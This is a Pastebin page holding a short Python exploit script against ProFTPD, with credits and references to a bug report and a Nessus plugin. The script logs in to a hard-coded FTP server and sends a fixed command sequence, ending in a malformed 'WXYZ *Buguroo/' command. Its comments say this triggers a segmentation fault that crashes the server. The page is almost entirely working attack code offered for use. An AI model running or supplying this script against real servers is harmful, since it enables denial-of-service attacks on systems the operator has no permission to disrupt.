Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- """
- ProFTPd Exploit
- Advisory:
- http://bugs.proftpd.org/show_bug.cgi?id=3711
- Nessus:
- http://www.nessus.org/plugins/index.php?view=single&id=56956
- Download:
- ftp://ftp1.at.proftpd.org/ProFTPD/distrib/source/
- Credits:
- Ruben Garrote García
- Twitter: @boken_
- rubengarrote@gmail.com
- http://boken00.blogspot.com - boken00@gmail.com
- """
- # Parameters
- ftpServer = "192.168.1.10"
- ftpServerPort = 21
- ftpUsername = "user"
- ftpPassword = "password"
- ftpClient = "192.168.1.11"
- ftpClientPort = "1025"
- # Commands to trigger the segmentation fault.
- ftpCommands = """USER %s
- PASS %s
- SYST
- TYPE A
- PORT %s,%s
- RETR nada
- WXYZ *Buguroo/
- QUIT
- """ % (ftpUsername, ftpPassword, ftpClient.replace('.',','), "%s,%s"%(("%04x"%int(ftpClientPort))[0:2],("%04x"%int(ftpClientPort))[2:4]))
- import socket
- # Open commands socket
- sc = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- sc.connect((ftpServer,ftpServerPort))
- # Will send FTP commands.
- for command in ftpCommands.split('\n'):
- print sc.recv(1024),
- sc.send(command+'\r\n')
- print command
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement